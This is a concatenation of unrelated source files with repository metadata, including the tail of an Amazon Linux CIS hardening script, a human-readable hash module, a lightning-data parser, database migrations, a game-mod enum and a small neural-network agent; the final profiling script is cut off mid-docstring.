        'mail.err': '/var/log/mail.err',
        'news.crit': '-/var/log/news/news.crit',
        'news.err': '-/var/log/news/news.err',
        'news.notice': '-/var/log/news/news.notice',
        '*.=warning;*.=err': '-/var/log/warn',
        '*.crit': '/var/log/warn',
        '*.*;mail.none;news.none': '-/var/log/messages',
        'local0,local1.*': '-/var/log/localmessages',
        'local2,local3.*': '-/var/log/localmessages',
        'local4,local5.*': '-/var/log/localmessages',
        # Fixed: value previously carried a stray trailing space, unlike the
        # three sibling localmessages entries above.
        'local6,local7.*': '-/var/log/localmessages',
        '$FileCreateMode': '0640'
    }).write()
def configure_log_file_permissions():
    """4.2.4 Ensure permissions on all logfiles are configured"""
    # Strip group write/execute and all 'other' permissions from every file
    # under /var/log.
    exec_shell([r'find /var/log -type f -exec chmod g-wx,o-rwx {} +'])
def configure_cron():
    """5.1 Configure cron"""
    # 5.1.1 Ensure cron daemon is enabled
    Service('crond').enable()
    # 5.1.2 - 5.1.8
    # Lock down cron/at configuration: root-owned, no group/other access,
    # and switch from deny-lists to (empty) allow-lists so only root may
    # schedule jobs.
    exec_shell([
        'chown root:root /etc/crontab',
        'chmod og-rwx /etc/crontab',
        'chown root:root /etc/cron.hourly',
        'chmod og-rwx /etc/cron.hourly',
        'chown root:root /etc/cron.daily',
        'chmod og-rwx /etc/cron.daily',
        'chown root:root /etc/cron.weekly',
        'chmod og-rwx /etc/cron.weekly',
        'chown root:root /etc/cron.monthly',
        'chmod og-rwx /etc/cron.monthly',
        'chown root:root /etc/cron.d',
        'chmod og-rwx /etc/cron.d',
        'rm -f /etc/cron.deny',
        'rm -f /etc/at.deny',
        'touch /etc/cron.allow',
        'touch /etc/at.allow',
        'chmod og-rwx /etc/cron.allow',
        'chmod og-rwx /etc/at.allow',
        'chown root:root /etc/cron.allow',
        'chown root:root /etc/at.allow'
    ])
def configure_sshd():
    """5.2 SSH Server Configuration"""
    # 5.2.1 Ensure permissions on /etc/ssh/sshd_config are configured
    exec_shell([
        'chown root:root /etc/ssh/sshd_config',
        'chmod og-rwx /etc/ssh/sshd_config'
    ])
    # 5.2.2 - 5.2.16
    # NOTE(review): AllowUsers is hard-coded to ec2-user -- any other login
    # account will be locked out of SSH after this runs.
    PropertyFile('/etc/ssh/sshd_config', ' ').override({
        'Protocol': '2',
        'LogLevel': 'INFO',
        'X11Forwarding': 'no',
        'MaxAuthTries': '4',
        'IgnoreRhosts': 'yes',
        'HostbasedAuthentication': 'no',
        'PermitRootLogin': 'no',
        'PermitEmptyPasswords': 'no',
        'PermitUserEnvironment': 'no',
        'Ciphers': 'aes256-ctr,aes192-ctr,aes128-ctr',
        'MACs': 'hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com',
        'ClientAliveInterval': '300',
        'ClientAliveCountMax': '0',
        'LoginGraceTime': '60',
        'AllowUsers': 'ec2-user',
        'Banner': '/etc/issue.net'
    }).write()
def configure_pam():
    """5.3 Configure PAM

    Rebuilds password-auth and system-auth from packaged templates plus the
    host's existing non-auth lines, forcing sha512 hashing and a 5-password
    reuse history, then tightens pwquality requirements.
    """
    def convert_password(line):
        # Append remember=5 / sha512 to the pam_unix 'password sufficient'
        # line if they are not already present.
        if password_unix_re.match(line):
            if 'remember=5' not in line:
                line += ' remember=5'
            if 'sha512' not in line:
                line += ' sha512'
        return line
    password_unix_re = re.compile(r'^password\s+sufficient\s+pam_unix.so')
    # Template supplies the auth section; everything except existing 'auth'
    # lines is carried over from the live config.
    password_auth_content = get_string_asset('/etc/pam.d/password-auth')
    password_auth_content += exec_shell([
        'cat /etc/pam.d/password-auth | grep -v "^auth"'
    ])
    password_auth_content = '\n'.join([
        convert_password(line) for line in password_auth_content.splitlines()
    ])
    with open('/etc/pam.d/password-auth-local', 'w') as f:
        f.write(password_auth_content)
    # Activate via symlink so the original file is preserved.
    exec_shell(['ln -sf /etc/pam.d/password-auth-local /etc/pam.d/password-auth'])
    # Same treatment for system-auth.
    system_auth_content = get_string_asset('/etc/pam.d/system-auth')
    system_auth_content += exec_shell([
        'cat /etc/pam.d/system-auth | grep -v "^auth"'
    ])
    system_auth_content = '\n'.join([
        convert_password(line) for line in system_auth_content.splitlines()
    ])
    with open('/etc/pam.d/system-auth-local', 'w') as f:
        f.write(system_auth_content)
    exec_shell(
        ['ln -sf /etc/pam.d/system-auth-local /etc/pam.d/system-auth'])
    # 5.3.1 password creation requirements: 14+ chars, at least one digit,
    # upper, lower and special character.
    PropertyFile('/etc/security/pwquality.conf', '=').override({
        'minlen': '14',
        'dcredit': '-1',
        'ucredit': '-1',
        'ocredit': '-1',
        'lcredit': '-1'
    }).write()
# NOTE(review): function name keeps the original 'parmas' typo because
# main() calls it by this name.
def configure_password_parmas():
    """5.4.1 Set Shadow Password Suite Parameters"""
    # Password aging: expire after 90 days, minimum 7 days between changes,
    # warn 7 days before expiry.
    PropertyFile('/etc/login.defs', '\t').override({
        'PASS_MAX_DAYS': '90',
        'PASS_MIN_DAYS': '7',
        'PASS_WARN_AGE': '7'
    }).write()
    # Lock new accounts 30 days after their password expires.
    exec_shell([
        'useradd -D -f 30'
    ])
def configure_umask():
    """5.4.3, 5.4.4"""
    # Rewrite any existing 'umask NNN' line in the shell init files to 027,
    # preserving surrounding whitespace via the capture groups.
    umask_reg = r'^(\s*)umask\s+[0-7]+(\s*)$'
    bashrc = exec_shell([
        'cat /etc/bashrc | sed -E "s/{}/\\1umask 027\\2/g"'.format(umask_reg)
    ])
    File('/etc/bashrc').write(bashrc)
    profile = exec_shell([
        'cat /etc/profile | sed -E "s/{}/\\1umask 027\\2/g"'.format(
            umask_reg)
    ])
    File('/etc/profile').write(profile)
def configure_su():
    """5.5 Ensure access to the su command is restricted"""
    # Install a pam.d/su that requires wheel membership, and make sure root
    # itself is in wheel.
    File('/etc/pam.d/su').write(get_string_asset('/etc/pam.d/su'))
    exec_shell('usermod -aG wheel root')
def main():
    """Parse command-line options and apply the CIS hardening sections.

    Must be run as root on the target instance: every step rewrites system
    configuration files and manages packages/services.
    """
    def _str2bool(value):
        # argparse's ``type=bool`` is a well-known trap: any non-empty
        # string (including "False") is truthy, so ``--chrony False`` used
        # to parse as True.  Parse the common spellings explicitly instead.
        if isinstance(value, bool):
            return value
        if value.lower() in ('1', 'true', 'yes', 'on'):
            return True
        if value.lower() in ('0', 'false', 'no', 'off'):
            return False
        raise argparse.ArgumentTypeError(
            'Boolean value expected, got {!r}'.format(value))
    parser = argparse.ArgumentParser(
        description='A script to harden Amazon Linux instance.')
    # The Amazon Time Sync Service is available through NTP
    # at the 169.254.169.123 IP address for any instance running in a VPC.
    # https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/set-time.html
    parser.add_argument('--time', metavar='<time server>', default='169.254.169.123',
                        help='Specify the upstream time server.')
    # Fixed: was ``type=bool`` (see _str2bool above).
    parser.add_argument('--chrony', action='store', type=_str2bool, default=True,
                        help='Use chrony for time synchronization')
    parser.add_argument('--no-backup', action='store_true',
                        help='Automatic config backup is disabled')
    parser.add_argument('--clients', nargs='+', metavar='<allowed clients>',
                        help='Specify a comma separated list of hostnames and host IP addresses.')
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='Display details including debugging output etc.')
    parser.add_argument('--disable-tcp-wrappers', action='store_true',
                        help='disable tcp-wrappers')
    parser.add_argument('--disable-pam', action='store_true',
                        help='disable pam')
    parser.add_argument('--disable-iptables', action='store_true',
                        help='disable iptables')
    parser.add_argument('--disable-mount-options', action='store_true',
                        help='disable set mount options')
    args = parser.parse_args()
    if args.verbose:
        logging.basicConfig(level=logging.INFO)
    else:
        logging.basicConfig(level=logging.WARN)
    logging.info(
        '[Config] Upstream time server is set as "%s"', args.time)
    if args.chrony:
        logging.info(
            '[Config] chrony will be used for time synchronization')
    else:
        logging.info(
            '[Config] ntp will be used for time synchronization')
    if args.clients:
        logging.info('[Config] Allowed clients are set as %s',
                     args.clients)
    if args.no_backup:
        logging.info('[Config] Automatic config backup is disabled')
        set_backup_enabled(False)
    # 1 Initial Setup
    disable_unused_filesystems()
    if not args.disable_mount_options:
        # NOTE(review): the actual call is intentionally commented out, so
        # --disable-mount-options currently has no effect.
        pass
        #set_mount_options()
    ensure_sticky_bit()
    disable_automounting()
    enable_aide()
    secure_boot_settings()
    apply_process_hardenings()
    configure_warning_banners()
    ensure_updated()
    # 2 Services
    disable_inetd_services()
    configure_time_synchronization(args.time, chrony=args.chrony)
    remove_x11_packages()
    disable_special_services()
    configure_mta()
    remove_insecure_clients()
    # 3 Network Configuration
    configure_host_network_params()
    configure_network_params()
    configure_ipv6_params()
    if not args.disable_tcp_wrappers:
        # NOTE(review): call intentionally commented out (flag is inert).
        pass
        #configure_tcp_wrappers(args.clients)
    disable_uncommon_protocols()
    if not args.disable_iptables:
        # NOTE(review): call intentionally commented out (flag is inert).
        pass
        #configure_iptables()
    # 4 Logging and Auditing
    configure_rsyslog()
    configure_log_file_permissions()
    # 5 Access, Authentication and Authorization
    configure_cron()
    configure_sshd()
    if not args.disable_pam:
        # NOTE(review): call intentionally commented out (flag is inert).
        pass
        #configure_pam()
    configure_password_parmas()
    configure_umask()
    #configure_su()
if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | noreply@github.com |
4057486e70b78cb4a5a51e88d6e9c8052b98fd00 | 54bc49797f827d51382efeb57945ba8b48d495e7 | /core/migrations/0021_coupon_amount.py | ff8490ec168d799d126f33f823edd6173f0b1d0a | [] | no_license | samarth1771/ecommerce | 3b9fa8662a29c6d44102738d748218aa72f32f0c | 94b5e72829f7901dc3e13b61a08da52f2afb40fc | refs/heads/master | 2022-12-24T01:23:57.720059 | 2020-09-25T05:12:07 | 2020-09-25T05:12:07 | 298,473,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 384 | py | # Generated by Django 2.2.3 on 2020-09-24 13:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0020_order_coupon'),
]
operations = [
migrations.AddField(
model_name='coupon',
name='amount',
field=models.FloatField(blank=True, null=True),
),
]
| [
"samarthpatel71@gmail.com"
] | samarthpatel71@gmail.com |
4b32abb8482edd3df05ec1cdbb77ec59595f0fc4 | 917763caec8661aaa223a9928e844c504e9175e5 | /humanhash.py | 90e01e699035416eb07e11c757bb64e8ea1ccf9e | [] | no_license | shabda/humanhash-coffeescript | c17f25b05ed3299a658a66847138fcedd95dec75 | 628d6b62964d707d85d7c1eb4718af144706b8e0 | refs/heads/master | 2016-08-03T03:11:23.270378 | 2011-12-13T05:51:44 | 2011-12-13T05:51:44 | 2,970,011 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,194 | py | """
humanhash: Human-readable representations of digests.
The simplest ways to use this module are the :func:`humanize` and :func:`uuid`
functions. For tighter control over the output, see :class:`HumanHasher`.
"""
import operator
import uuid as uuidlib
# 256-entry word list: one human-readable word per possible byte value.
DEFAULT_WORDLIST = (
    'ack', 'alabama', 'alanine', 'alaska', 'alpha', 'angel', 'apart', 'april',
    'arizona', 'arkansas', 'artist', 'asparagus', 'aspen', 'august', 'autumn',
    'avocado', 'bacon', 'bakerloo', 'batman', 'beer', 'berlin', 'beryllium',
    'black', 'blossom', 'blue', 'bluebird', 'bravo', 'bulldog', 'burger',
    'butter', 'california', 'carbon', 'cardinal', 'carolina', 'carpet', 'cat',
    'ceiling', 'charlie', 'chicken', 'coffee', 'cola', 'cold', 'colorado',
    'comet', 'connecticut', 'crazy', 'cup', 'dakota', 'december', 'delaware',
    'delta', 'diet', 'don', 'double', 'early', 'earth', 'east', 'echo',
    'edward', 'eight', 'eighteen', 'eleven', 'emma', 'enemy', 'equal',
    'failed', 'fanta', 'fifteen', 'fillet', 'finch', 'fish', 'five', 'fix',
    'floor', 'florida', 'football', 'four', 'fourteen', 'foxtrot', 'freddie',
    'friend', 'fruit', 'gee', 'georgia', 'glucose', 'golf', 'green', 'grey',
    'hamper', 'happy', 'harry', 'hawaii', 'helium', 'high', 'hot', 'hotel',
    'hydrogen', 'idaho', 'illinois', 'india', 'indigo', 'ink', 'iowa',
    'island', 'item', 'jersey', 'jig', 'johnny', 'juliet', 'july', 'jupiter',
    'kansas', 'kentucky', 'kilo', 'king', 'kitten', 'lactose', 'lake', 'lamp',
    'lemon', 'leopard', 'lima', 'lion', 'lithium', 'london', 'louisiana',
    'low', 'magazine', 'magnesium', 'maine', 'mango', 'march', 'mars',
    'maryland', 'massachusetts', 'may', 'mexico', 'michigan', 'mike',
    'minnesota', 'mirror', 'mississippi', 'missouri', 'mobile', 'mockingbird',
    'monkey', 'montana', 'moon', 'mountain', 'muppet', 'music', 'nebraska',
    'neptune', 'network', 'nevada', 'nine', 'nineteen', 'nitrogen', 'north',
    'november', 'nuts', 'october', 'ohio', 'oklahoma', 'one', 'orange',
    'oranges', 'oregon', 'oscar', 'oven', 'oxygen', 'papa', 'paris', 'pasta',
    'pennsylvania', 'pip', 'pizza', 'pluto', 'potato', 'princess', 'purple',
    'quebec', 'queen', 'quiet', 'red', 'river', 'robert', 'robin', 'romeo',
    'rugby', 'sad', 'salami', 'saturn', 'september', 'seven', 'seventeen',
    'shade', 'sierra', 'single', 'sink', 'six', 'sixteen', 'skylark', 'snake',
    'social', 'sodium', 'solar', 'south', 'spaghetti', 'speaker', 'spring',
    'stairway', 'steak', 'stream', 'summer', 'sweet', 'table', 'tango', 'ten',
    'tennessee', 'tennis', 'texas', 'thirteen', 'three', 'timing', 'triple',
    'twelve', 'twenty', 'two', 'uncle', 'undress', 'uniform', 'uranus', 'utah',
    'vegan', 'venus', 'vermont', 'victor', 'video', 'violet', 'virginia',
    'washington', 'west', 'whiskey', 'white', 'william', 'winner', 'winter',
    'wisconsin', 'wolfram', 'wyoming', 'xray', 'yankee', 'yellow', 'zebra',
    'zulu')


class HumanHasher(object):
    """
    Transforms hex digests to human-readable strings.

    The format of these strings will look something like:
    `victor-bacon-zulu-lima`. The output is obtained by compressing the input
    digest to a fixed number of bytes, then mapping those bytes to one of 256
    words. A default wordlist is provided, but you can override this if you
    prefer.

    As long as you use the same wordlist, the output will be consistent (i.e.
    the same digest will always render the same representation).
    """

    def __init__(self, wordlist=DEFAULT_WORDLIST):
        # Fixed: originally raised the undefined name ``ArgumentError``
        # (a NameError at runtime); ValueError is the intended behavior.
        if len(wordlist) != 256:
            raise ValueError("Wordlist must have exactly 256 items")
        self.wordlist = wordlist

    def humanize(self, hexdigest, words=4, separator='-'):
        """
        Humanize a given hexadecimal digest.

        Change the number of words output by specifying `words`. Change the
        word separator with `separator`.

            >>> digest = '60ad8d0d871b6095808297'
            >>> HumanHasher().humanize(digest)
            'sodium-magnesium-nineteen-hydrogen'
        """
        # Pair up hex characters and parse each pair as a byte value 0-255.
        # (Fixed for Python 3: the original relied on py2's list-returning
        # ``map``; a trailing odd hex character is ignored, as before.)
        byte_values = [int(hi + lo, 16)
                       for hi, lo in zip(hexdigest[::2], hexdigest[1::2])]
        # Compress an arbitrary number of bytes to `words`.
        compressed = self.compress(byte_values, words)
        # Map the compressed byte values through the word list.
        return separator.join(self.wordlist[byte] for byte in compressed)

    @staticmethod
    def compress(bytes, target):
        """
        Compress a list of byte values to a fixed target length.

            >>> bytes = [96, 173, 141, 13, 135, 27, 96, 149, 128, 130, 151]
            >>> HumanHasher.compress(bytes, 4)
            [205, 128, 156, 96]

        Attempting to compress a smaller number of bytes to a larger number
        raises ValueError ("Fewer input bytes than requested output").
        """
        length = len(bytes)
        if target > length:
            raise ValueError("Fewer input bytes than requested output")
        # Split `bytes` into `target` segments; any left-over bytes are
        # appended to the last segment.  (xrange/reduce replaced with
        # Python 3 compatible equivalents.)
        seg_size = length // target
        segments = [list(bytes[i * seg_size:(i + 1) * seg_size])
                    for i in range(target)]
        segments[-1].extend(bytes[target * seg_size:])
        # Use a simple XOR checksum-like function for compression.
        checksums = []
        for segment in segments:
            checksum = 0
            for byte in segment:
                checksum ^= byte
            checksums.append(checksum)
        return checksums

    def uuid(self, **params):
        """
        Generate a UUID with a human-readable representation.

        Returns `(human_repr, full_digest)`. Accepts the same keyword
        arguments as :meth:`humanize` (they'll be passed straight through).
        """
        digest = str(uuidlib.uuid4()).replace('-', '')
        return self.humanize(digest, **params), digest
# Module-level singleton plus convenience aliases for the common case.
# Note: ``uuid`` deliberately shadows the stdlib module name within this
# module's public API (the stdlib module is imported as ``uuidlib`` above).
DEFAULT_HASHER = HumanHasher()
uuid = DEFAULT_HASHER.uuid
humanize = DEFAULT_HASHER.humanize
"shabda@agiliq.com"
] | shabda@agiliq.com |
8a21fce1e50a4aee7f479ffad6660a64753cc79c | 5df0d9ac4ffcce7465de0037da26c76c95b4c0d0 | /ualf/ualf.py | c6e194e229d3c8819f480a3c537e6060e2361938 | [
"MIT"
] | permissive | auwalsoe/ualf_parser | f3d4acf805c58271a389e300ff891deb3cbb5cf7 | b7e6c649b8eb0a9766f44837cb34236625194e36 | refs/heads/master | 2020-03-19T05:33:56.016790 | 2020-02-15T17:31:26 | 2020-02-15T17:31:26 | 135,944,135 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,166 | py | '''UALF data parsing class'''
class Ualf:
def __init__(self, ualf_coordinates):
self.read_ualf(ualf_coordinates)
def read_ualf(self, ualf_coordinates):
ualf_coordinates = list(ualf_coordinates)
self.version = int(ualf_coordinates[0])
self.year = int(''.join(ualf_coordinates[2:6]))
self.month = int(''.join(ualf_coordinates[7:10]))
self.day = int(''.join(ualf_coordinates[10:13]))
self.hour = int(''.join(ualf_coordinates[13:15]))
self.minutes = int(''.join(ualf_coordinates[15:18]))
self.seconds = int(''.join(ualf_coordinates[18:21]))
self.nanoseconds = int(''.join(ualf_coordinates[21:31]))
self.latitude = float(''.join(ualf_coordinates[31:39]))
self.longitude = float(''.join(ualf_coordinates[39:47]))
self.peak_current = int(''.join(ualf_coordinates[47:51]))
self.multiplicity = int(''.join(ualf_coordinates[51:53]))
self.number_of_sensors = int(''.join(ualf_coordinates[53:56]))
self.degrees_of_freedom = int(''.join(ualf_coordinates[56:59]))
self.ellipse_angle = float(''.join(ualf_coordinates[59:66]))
self.semi_major_axis = float(''.join(ualf_coordinates[66:71]))
self.semi_minor_axis = float(''.join(ualf_coordinates[71:75]))
self.chi_square_value = float(''.join(ualf_coordinates[76:81]))
self.rise_time = float(''.join(ualf_coordinates[81:86]))
self.peak_to_zero_time = float(''.join(ualf_coordinates[86:91]))
self.max_rate_of_rise = float(''.join(ualf_coordinates[91:96]))
self.cloud_indicator = int(''.join(ualf_coordinates[96:98]))
self.angle_indicator = int(''.join(ualf_coordinates[98:100]))
self.signal_indicator = int(''.join(ualf_coordinates[100:102]))
self.timing_indicator = int(''.join(ualf_coordinates[102:104]))
self.ualf_dict = self.make_ualf_dict()
def make_ualf_dict(self):
ualf_dict = {
"version" : self.version,
"year" : self.year,
"month" : self.month,
"day" : self.day,
"hour" : self.hour,
"minutes" : self.minutes,
"seconds" : self.seconds,
"nanoseconds" : self.nanoseconds,
"latitude" : self.latitude,
"longitude" : self.longitude,
"peak_current" : self.peak_current,
"multiplicity" : self.multiplicity,
"number_of_sensors" : self.number_of_sensors,
"degrees_of_freedom" : self.degrees_of_freedom,
"semi_major_axis" : self.semi_major_axis,
"semi_minor_axis" : self.semi_minor_axis,
"chi_square_value" : self.chi_square_value,
"rise_time" : self.rise_time,
"peak_to_zero_time" : self.peak_to_zero_time,
"max_rate_of_rise" : self.max_rate_of_rise,
"cloud_indicator" : self.cloud_indicator,
"signal_indicator" : self.signal_indicator,
"timing_indicator" : self.timing_indicator}
return ualf_dict
def parse(self):
    """Return the record's parsed fields as a dict (same object, not a copy)."""
    parsed = self.ualf_dict
    return parsed
def print_ualf(self):
    """Dump the parsed record dict to stdout (debug helper)."""
    print("{}".format(self.ualf_dict))
| [
"auwalsoe@gmail.com"
] | auwalsoe@gmail.com |
cc0c3f49a86cd19e0eac92eb6d9d45901dc5447e | fb5c5d50d87a6861393d31911b9fae39bdc3cc62 | /Scripts/sims4communitylib/enums/common_funds_sources.py | b752318a7a87e9b2ab9fbcb9e237f428646c1ce1 | [
"CC-BY-4.0"
] | permissive | ColonolNutty/Sims4CommunityLibrary | ee26126375f2f59e5567b72f6eb4fe9737a61df3 | 58e7beb30b9c818b294d35abd2436a0192cd3e82 | refs/heads/master | 2023-08-31T06:04:09.223005 | 2023-08-22T19:57:42 | 2023-08-22T19:57:42 | 205,197,959 | 183 | 38 | null | 2023-05-28T16:17:53 | 2019-08-29T15:48:35 | Python | UTF-8 | Python | false | false | 2,552 | py | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Dict
from sims.funds import FundsSource
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonFundsSource(CommonInt):
    """Sources of funds."""
    HOUSEHOLD: 'CommonFundsSource' = ...
    RETAIL: 'CommonFundsSource' = ...
    BUSINESS: 'CommonFundsSource' = ...
    STATISTIC: 'CommonFundsSource' = ...
    BUCKS: 'CommonFundsSource' = ...
    NO_SOURCE: 'CommonFundsSource' = ...

    @staticmethod
    def convert_to_vanilla(value: 'CommonFundsSource') -> FundsSource:
        """convert_to_vanilla(value)

        Convert a value into the vanilla FundsSource enum.

        :param value: An instance of the enum.
        :type value: CommonFundsSource
        :return: The specified value translated to FundsSource or HOUSEHOLD if the value could not be translated.
        :rtype: Union[FundsSource, None]
        """
        # One-to-one translation table; unknown values fall back to HOUSEHOLD.
        translations: Dict[CommonFundsSource, FundsSource] = {
            common: vanilla
            for (common, vanilla) in (
                (CommonFundsSource.HOUSEHOLD, FundsSource.HOUSEHOLD),
                (CommonFundsSource.RETAIL, FundsSource.RETAIL),
                (CommonFundsSource.BUSINESS, FundsSource.BUSINESS),
                (CommonFundsSource.STATISTIC, FundsSource.STATISTIC),
                (CommonFundsSource.BUCKS, FundsSource.BUCKS),
                (CommonFundsSource.NO_SOURCE, FundsSource.NO_SOURCE),
            )
        }
        return translations.get(value, FundsSource.HOUSEHOLD)

    @staticmethod
    def convert_from_vanilla(value: FundsSource) -> 'CommonFundsSource':
        """convert_from_vanilla(value)

        Convert a vanilla FundsSource to value.

        :param value: An instance of the enum.
        :type value: FundsSource
        :return: The specified value translated to CommonFundsSource or HOUSEHOLD if the value could not be translated.
        :rtype: CommonFundsSource
        """
        # Exact inverse of convert_to_vanilla; unknown values fall back to HOUSEHOLD.
        translations: Dict[FundsSource, CommonFundsSource] = {
            vanilla: common
            for (common, vanilla) in (
                (CommonFundsSource.HOUSEHOLD, FundsSource.HOUSEHOLD),
                (CommonFundsSource.RETAIL, FundsSource.RETAIL),
                (CommonFundsSource.BUSINESS, FundsSource.BUSINESS),
                (CommonFundsSource.STATISTIC, FundsSource.STATISTIC),
                (CommonFundsSource.BUCKS, FundsSource.BUCKS),
                (CommonFundsSource.NO_SOURCE, FundsSource.NO_SOURCE),
            )
        }
        return translations.get(value, CommonFundsSource.HOUSEHOLD)
| [
"ColonolNutty@hotmail.com"
] | ColonolNutty@hotmail.com |
f2f46024e6515ff95aa1fe7addebe8370c56a73e | 85fd399e0cf9997028e5d30aed85cf20cf476cb5 | /mlrun/api/migrations/versions/d781f58f607f_tag_object_name_string.py | ad89d4e7c0c1c9318e5a19460cccad34d34aa342 | [
"Apache-2.0"
] | permissive | omarirfa/mlrun | deb9c63ec8bb50f80e3e77d042fde1ddb52d5284 | 6336baf610bc67997c60be4ad7c32b4ea7d94d49 | refs/heads/master | 2023-08-13T19:14:43.362103 | 2021-09-22T09:59:58 | 2021-09-22T09:59:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,166 | py | """tag object name string
Revision ID: d781f58f607f
Revises: e1dd5983c06b
Create Date: 2021-07-29 16:06:45.555323
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "d781f58f607f"
down_revision = "deac06871ace"
branch_labels = None
depends_on = None
def upgrade():
    """Widen the ``obj_name`` column to a free-form string on each tag table."""
    for table_name in ("feature_sets_tags", "feature_vectors_tags", "functions_tags"):
        with op.batch_alter_table(table_name) as batch_op:
            batch_op.alter_column(column_name="obj_name", type_=sa.String())
def downgrade():
    """Revert ``obj_name`` back to an integer column (reverse table order)."""
    for table_name in ("functions_tags", "feature_vectors_tags", "feature_sets_tags"):
        with op.batch_alter_table(table_name) as batch_op:
            batch_op.alter_column(column_name="obj_name", type_=sa.Integer())
| [
"noreply@github.com"
] | noreply@github.com |
6f0d14d9a72dd011c196fe8d61e322a505a18730 | 6f795b6e7d92678f66ace97ec48a0790467347c3 | /Primitive.py | 4d03494830b16735894f93fffc8216530ddd9859 | [] | no_license | zshimanchik/primitive-reflexes | 7164be7396d21fdbdf822dafe044aa670385303d | bcabd5160b4a8a1c9e9e072e1d83f6ba29330ef7 | refs/heads/master | 2020-04-05T22:48:06.898392 | 2015-08-16T13:07:12 | 2015-08-16T13:07:12 | 37,374,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,594 | py | __author__ = 'zshimanchik'
import math
from NeuralNetwork.NeuralNetwork import NeuralNetwork
class Primitive():
    """A simple learning agent: a circle with radial sensors whose movement
    and growth are driven by a neural network trained via stimulation
    feedback from the environment."""

    DEBUG = True
    MIN_BRAIN_STIMULATION = 0.04
    MAX_BRAIN_STIMULATION = 0.1
    BRAIN_STIMULATION_FILTER_THRESHOLD = 0.3
    RANDOM_VALUE_FOR_ANSWER = 0.1

    def __init__(self):
        # World position and radius of the agent.
        self.x = 89
        self.y = 120
        self.size = 30
        # Sensors are spaced evenly around the rim; each reports 3 values.
        self.sensor_count = 16
        self.sensor_values = []
        # Internal state / stimulation bookkeeping.
        self.state = 0
        self.stimulation = 0
        self.prev_influence = 0
        self.brain_stimulation = 0
        self.idle_time = 0
        self.random_plan = []
        self.first_state = True
        # Network: (3 per sensor) inputs -> 18 hidden -> 3 outputs (dx, dy, dsize).
        self.brain = NeuralNetwork([self.sensor_count * 3, 18, 3],
                                   random_value=self.RANDOM_VALUE_FOR_ANSWER)

    def sensors_positions(self):
        """Return (x, y) world coordinates of each sensor on the circle rim."""
        return [
            (math.cos(angle) * self.size + self.x,
             math.sin(angle) * self.size + self.y)
            for angle in (n * math.pi * 2 / self.sensor_count
                          for n in range(self.sensor_count))
        ]

    def update(self, sensors_values):
        """Feed one frame of sensor readings through the brain and act on it."""
        # Regroup the flat input into per-sensor triples for inspection.
        self.sensor_values = zip(sensors_values[::3], sensors_values[1::3],
                                 sensors_values[2::3])
        answer = self.brain.calculate(sensors_values)
        if self.DEBUG:
            print("answ={:.6f}, {:.6f}, {:.6f} inp={}".format(
                answer[0], answer[1], answer[2], self.sensor_values))
        dx, dy, d_size = answer[0], answer[1], answer[2]
        self.move(dx, dy)
        self.grow_up(d_size)

    def change_state(self, influence_value):
        """Apply an environmental influence and train the brain on the delta."""
        # Accumulate influence into state, clamped to [-1, 1].
        self.state = min(max(self.state + influence_value, -1.0), 1.0)
        # Stimulation is the change in influence since the previous call.
        self.stimulation = influence_value - self.prev_influence
        self.prev_influence = influence_value
        if self.DEBUG:
            print("stimulation={:.6f}".format(self.stimulation))
        # The very first call has no meaningful delta; skip training once.
        if self.first_state:
            self.first_state = False
            return
        # Signed, clamped teaching signal; large deltas above the filter
        # threshold are zeroed out entirely.
        sign = (self.stimulation > 0) - (self.stimulation < 0)
        magnitude = abs(self.stimulation)
        clamped = min(max(Primitive.MIN_BRAIN_STIMULATION, magnitude),
                      Primitive.MAX_BRAIN_STIMULATION)
        self.brain_stimulation = \
            (magnitude < Primitive.BRAIN_STIMULATION_FILTER_THRESHOLD) * sign * clamped
        self.brain.teach_considering_random(self.brain_stimulation)

    def move(self, dx, dy):
        """Translate the agent by (dx, dy)."""
        self.x, self.y = self.x + dx, self.y + dy

    def grow_up(self, d_size):
        """Adjust the radius by d_size, clamped to [14, 40]."""
        self.size = min(max(self.size + d_size, 14), 40)
| [
"zahar.shamanchik@gmail.com"
] | zahar.shamanchik@gmail.com |
43eaf19862f81f19ed856901ec0e25148584096e | 44471e1b64165c760c27cb934ff8800eb0e64ebd | /profile_test.py | aab9415d74a439c41b377cece1e796b3e5fdcd1d | [
"MIT"
] | permissive | mlvc-lab/ILKP | 93db8ada28d411a4cf4a9ebdb25b65a9da0cd6ec | d9c05223f742167c8dd6543a3276fde08b7986ff | refs/heads/master | 2023-07-23T22:18:41.678177 | 2021-09-05T05:14:06 | 2021-09-05T05:14:06 | 403,219,642 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 19,461 | py | import time
import pathlib
from os.path import isfile
import numpy as np
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.optim as optim
import torch.backends.cudnn as cudnn
import torch.autograd.profiler as profiler
import models
import config
from utils import *
from data import DataLoader
from find_similar_kernel import find_kernel, find_kernel_pw
from quantize import quantize, quantize_ab
# for ignore imagenet PIL EXIF UserWarning
import warnings
warnings.filterwarnings("ignore", "(Possibly )?corrupt EXIF data", UserWarning)
# for sacred logging
from sacred import Experiment
from sacred.observers import MongoObserver
# sacred experiment
ex = Experiment('WP_MESS')
ex.observers.append(MongoObserver.create(url=config.MONGO_URI,
db_name=config.MONGO_DB))
@ex.config
def hyperparam():
    """
    Sacred experiment hyperparameters.
    :return:
    """
    # sacred's @ex.config captures the local variable ``args`` (the argparse
    # defaults from config.config()) into the experiment configuration scope,
    # which is why it is assigned but never referenced here.
    args = config.config()
@ex.main
def main(args):
    """Experiment entry point: build the model, optionally resume/retrain/
